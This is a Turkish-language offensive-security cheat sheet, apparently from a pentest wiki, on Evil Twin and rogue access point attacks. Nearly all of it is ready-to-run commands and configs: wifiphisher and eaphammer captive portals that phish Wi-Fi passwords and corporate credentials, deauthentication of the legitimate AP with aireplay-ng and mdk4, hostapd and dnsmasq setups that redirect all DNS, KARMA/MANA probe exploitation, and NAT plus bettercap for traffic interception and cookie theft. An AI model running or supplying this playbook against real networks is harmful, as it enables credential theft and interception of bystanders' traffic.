Evil Twin & Rogue AP
ATT&CK T1557 difficulty: orta
Evil Twin, meşru bir ağın SSID’sini (ve çoğu zaman BSSID/kanal ipuçlarını) taklit eden sahte bir erişim noktasıdır. Kurbanlar bilerek veya otomatik roaming ile bağlanınca saldırgan trafiğe araya girer, captive portal ile PSK/kimlik toplar veya açık HTTP oturumlarını yakalar.
Senaryolar
Section titled “Senaryolar”PSK phishing → "firmware upgrade" / "Wi‑Fi login" portal → PSK veya AD credsAçık ağ twin → misafir/otel SSID kopyası → SSLStrip/MITM / cookieKARMA/MANA → istemci probe request'lerine cevap → Preferred Network List sömürüsüEnterprise twin → rogue RADIUS (ayrı sayfa: WPA-Enterprise)Ön koşullar
Section titled “Ön koşullar”- AP mode destekleyen arayüz (wlan0) + opsiyonel ikinci kart deauth için- hostapd / hostapd-mana / eaphammer / wifiphisher- dnsmasq (DHCP+DNS) veya araçların gömülü stack'i- IP forwarding + iptables NAT (internet paylaşımı istenirse)Tipik akış
Section titled “Tipik akış”-
Hedef SSID’yi belirle — airodump ile ESSID, kanal, ENC; istemci Probes listesini KARMA için kaydet:
Terminal window sudo airodump-ng --band abg wlan0mon -
Rogue AP ayağa kaldır — aynı ESSID (PSK ağlarda açık veya WPA ile portal senaryosuna göre):
Terminal window sudo wifiphisher -aI wlan0mon -e "Kurumsal-WiFi" -p firmware-upgradeTerminal window eaphammer -i wlan0 --essid "Kurumsal-WiFi" --captive-portal -
Gerçek AP’yi zayıflat — deauth / disassoc ile istemcileri kaydır:
Terminal window sudo aireplay-ng --deauth 0 -a REAL_BSSID wlan1monTerminal window sudo mdk4 wlan1mon d -B REAL_BSSID -
Kimlik / PSK topla — portal POST log’ları; ardından PSK ile meşru ağa bağlan veya AD hesabını spray et.
-
Trafiği MITM et — bağlanan istemci için:
Terminal window sudo sysctl -w net.ipv4.ip_forward=1Terminal window sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADETerminal window sudo bettercap -iface at0
hostapd + dnsmasq (manuel)
Section titled “hostapd + dnsmasq (manuel)”interface=wlan0driver=nl80211ssid=Kurumsal-WiFihw_mode=gchannel=6sudo hostapd hostapd.confinterface=wlan0dhcp-range=192.168.66.10,192.168.66.100,12hdhcp-option=3,192.168.66.1dhcp-option=6,192.168.66.1address=/#/192.168.66.1 # tüm DNS → portalsudo ip addr add 192.168.66.1/24 dev wlan0sudo dnsmasq -C dnsmasq.conf -dPortal için basit HTTP (ör. php -S 192.168.66.1:80) veya wifiphisher şablonları.
KARMA / MANA
Section titled “KARMA / MANA”Cihazlar bilinen ağları arayan probe request yayınlar. KARMA bu probe’lara sahte beacon/probe response ile cevap verir; istemci “ev Wi‑Fi” sandığı ağa bağlanır.
sudo hostapd-mana /etc/hostapd-mana/hostapd.confeaphammer -i wlan0 --karma --captive-portalDeğerli probe'lar: ev SSID, otel, "eduroam", şirket misafir ağıBoş/gizli preferred list → daha az otomatik bağlanmaModern OS'ler KARMA'ya kısmen dirençli; yine de IoT/eski cihazlar düşerPSK twin (aynı şifre ile)
Section titled “PSK twin (aynı şifre ile)”PSK’yi başka yöntemle (handshake/PMKID/WPS) biliyorsanız, aynı PSK ile evil twin kurup trafiği şeffaf MITM edebilirsiniz — portal gerekmez:
wpa=2wpa_passphrase=KnownPSKwpa_key_mgmt=WPA-PSKrsn_pairwise=CCMPİstemci sessizce bağlanır; ardından sniffing / DNS spoof.
Captive portal şablon fikirleri
Section titled “Captive portal şablon fikirleri”firmware-upgrade → "AP güncellemesi, PSK girin"oauth-login → sahte Google/Microsoft OAuthwifi_connect → kurumsal kullanıcı/şifre formuplugin_update → sahte eklenti indir → payloadsudo wifiphisher --list-pluginssudo wifiphisher -aI wlan0mon -e "Airport_Free_WiFi" -p oauth-loginÇift arayüz düzeni
Section titled “Çift arayüz düzeni”wlan0 → AP mode (rogue / hostapd)wlan1 → monitor (deauth gerçek BSSID)eth0 → uplink (NAT, isteğe bağlı internet)Tek kartta AP + deauth genelde dengesizdir; mümkünse iki adaptör kullanın.
Komut üreteci
Section titled “Komut üreteci”wifiphisher · evil twin
embedded toolsudo wifiphisher -aI wlan0 -e Kurumsal-WiFi -p firmware-upgradewifiphisher · evil twin
Section titled “wifiphisher · evil twin”Saldırı zinciri
Section titled “Saldırı zinciri”airodump → ESSID + client probes → wifiphisher / eaphammer captive → mdk4 deauth gerçek AP → PSK/creds log → meşru ağa katıl / sprayPSK biliniyor → hostapd WPA2 twin → DNS spoof + mitmproxy → oturum çerezi / iç portal creds